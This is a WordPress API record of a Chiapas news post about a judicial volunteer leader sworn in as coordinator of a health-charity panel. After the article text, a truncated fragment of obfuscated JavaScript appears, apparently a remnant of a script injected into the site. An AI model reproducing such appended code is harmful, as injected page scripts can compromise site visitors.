{"id":22151,"date":"2025-05-30T03:56:36","date_gmt":"2025-05-30T03:56:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22151"},"modified":"2025-05-30T03:56:37","modified_gmt":"2025-05-30T03:56:37","slug":"toma-protesta-dalal-rabban-como-coordinadora-de-la-mesa-interinstitucional-red-salud-internacional-y-good-deeds-day-del-estado","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22151","title":{"rendered":"Toma protesta Dalal Rabban como coordinadora de la Mesa Interinstitucional Red Salud Internacional y Good Deeds Day del estado"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"22153\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143116-1024x681.jpg\" alt=\"\" class=\"wp-image-22153\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143116-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143116-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143116-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143116-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143116-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143116-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"678\" data-id=\"22152\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143120-1024x678.jpg\" alt=\"\" class=\"wp-image-22152\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143120-1024x678.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143120-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143120-768x509.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143120-1536x1017.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143120-2048x1356.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143120-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"22154\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143124-1024x681.jpg\" alt=\"\" class=\"wp-image-22154\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143124-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143124-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143124-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143124-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143124-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143124-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>29 de mayo del 2025. La presidenta del Voluntariado del Poder Judicial del Estado, Dalal Rabban Castell, acompa\u00f1ada del magistrado presidente, Juan Carlos Moreno Guill\u00e9n, particip\u00f3 en la instalaci\u00f3n de la Mesa Interinstitucional de Fundaci\u00f3n Red Salud Internacional y Good Deeds Day del estado, donde tom\u00f3 protesta como coordinadora de esta Mesa.<\/p>\n\n\n\n<p>Al asumir este noble cargo, manifest\u00f3 que es un verdadero honor aceptar la designaci\u00f3n, agradeciendo la confianza depositada en este Voluntariado para tan importante encomienda, convencida de que, trabajando de manera colaborativa y coordinada, se lograr\u00e1n avances significativos en las mejoras para la poblaci\u00f3n vulnerable.<\/p>\n\n\n\n<p>Por su parte, en su mensaje de bienvenida, el coordinador general de la Fundaci\u00f3n Red Salud Internacional, Gerardo Hiram D\u00edaz Sol\u00eds, se congratul\u00f3 de la participaci\u00f3n de todas y todos los presentes en beneficio de la sociedad.<\/p>\n\n\n\n<p>Asimismo, el coordinador nacional de Good Deeds Day, Salvador S\u00e1nchez Trujillo, agradeci\u00f3 la recepci\u00f3n y anfitrion\u00eda del Poder Judicial y calific\u00f3 como un hecho hist\u00f3rico la consolidaci\u00f3n de esta mesa que involucra a diversos sectores sociales e instituciones p\u00fablicas.<\/p>\n\n\n\n<p>De igual manera, la presidenta de la fundaci\u00f3n Red Salud, Vanessa Traconis Quevedo, extern\u00f3 su satisfacci\u00f3n y reiter\u00f3 su agradecimiento a la presidenta del Voluntariado del Poder Judicial por su compromiso genuino con las buenas acciones.<\/p>\n\n\n\n<p>En tanto, las y los representantes de las asociaciones civiles, medios de comunicaci\u00f3n e instituciones p\u00fablicas y privadas que integran esta Mesa Interinstitucional, se presentaron y expusieron los objetivos de sus organizaciones, al tiempo de refrendar su compromiso para sumarse en las actividades que emanen en esta Mesa.<\/p>\n\n\n\n<p>Finalmente, los coordinadores de Red Salud y Good Deeds Day del estado hicieron entrega de un reconocimiento a la presidenta del Voluntariado del Poder Judicial de Chiapas.<\/p>\n\n\n\n<p>Con estas acciones, el Voluntariado de esta casa de la justicia reitera su compromiso de sumarse y trabajar coordinadamente con el objetivo de beneficiar a los diversos sectores vulnerables de nuestra entidad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 29 de mayo del 2025. La presidenta del Voluntariado del Poder Judicial del Estado, Dalal Rabban Castell, acompa\u00f1ada del magistrado presidente, Juan Carlos Moreno Guill\u00e9n, particip\u00f3 en la instalaci\u00f3n de la Mesa Interinstitucional de Fundaci\u00f3n Red Salud Internacional y Good Deeds Day del estado, donde tom\u00f3 protesta como coordinadora de esta Mesa. Al asumir &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22153,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22151","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22151","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22151"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22151\/revisions"}],"predecessor-version":[{"id":22155,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22151\/revisions\/22155"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22153"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22151"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22151"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22151"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}